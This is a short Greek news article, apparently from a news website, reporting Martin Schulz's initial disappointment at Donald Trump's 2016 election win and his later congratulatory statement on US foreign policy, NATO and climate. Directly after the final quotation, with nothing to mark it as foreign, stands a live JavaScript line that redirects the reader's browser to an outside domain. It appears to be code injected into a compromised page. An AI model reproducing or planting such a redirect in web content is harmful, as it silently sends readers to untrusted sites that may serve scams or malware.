Μετά την απογοήτευση, τα συγχαρητήρια από τον Σουλτς

0
9

 

Την έκπληξη και την απογοήτευσή του εξέφρασε ο πρόεδορς του Ευρωπαϊκού Κοινοβουλίου Μάρτιν Σουλτς μόλις ανακοινώθηκε η νίκη του Ντόναλντ Τρμπ. Ωστόσο, ως είθισται στη συνέχεια προέβη σε δήλωση με την οποία συγχαίρει τον νεοεκλεγέντα 45ο πρόεδρο των ΗΠΑ.

«Το εκλογικό σώμα μίλησε. Η νίκη του Ντόναλντ Τραμπ είναι ξεκάθαρη και πρέπει να γίνει σεβαστή. Συγχαίρω τον ίδιο και το Ρεπουμπλικάνικο κόμμα για τη νίκη τους. Ο Ντ. Τραμπ κατάφερε να γίνει ο κύριος εκφραστής των φόβων εκατομμυρίων Αμερικανών. Οι ανησυχίες αυτές πρέπει τώρα να αντιμετωπιστούν με αξιόπιστες πολιτικές και προτάσεις», είπε ο κ. Σουλτς και στη συνέχεια επεσήμανε πως ο νέος Πρόεδρος θα έχει το δύσκολο έργο να ενώσει ένα «διαιρεμένο έθνος».

Όπως συμπληρώνει, αυτήν τη στιγμή παραμένουν αναπάντητες οι περισσότερες ερωτήσεις σχετικά με την με την εξωτερική προοπτική της μελλοντικής προεδρίας Τραμπ. «Από τη Συρία στο Ιράκ, από την Ουκρανία στην Λιβύη, ο ρόλος του Τραμπ στη διπλωματία και την επίτευξη συμφωνιών θα δοκιμαστεί από την πρώτη μέρα και θα απαιτήσει το σωστό μίγμα της υπευθυνότητας, της συγκράτησης και της ηγεσίας», τονίζει ο πρόεδρος του ΕΚ και προσθέτει: «Η παγκόσμια πολιτική απαιτεί τη συνεχή προσήλωση των ΗΠΑ για έναν καλύτερο κόσμο για τα παιδιά μας. Από την καταπολέμηση της κλιματικής αλλαγής, στη δέσμευσή των ΗΠΑ στο ΝΑΤΟ, ο κόσμος περιμένει και ελπίζει μια εξωστρεφή προεδρία που θα στοχεύει στη διαμόρφωση διεθνών σχέσεων και στην προάσπιση των αξιών της ελευθερίας και της δημοκρατίας». setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here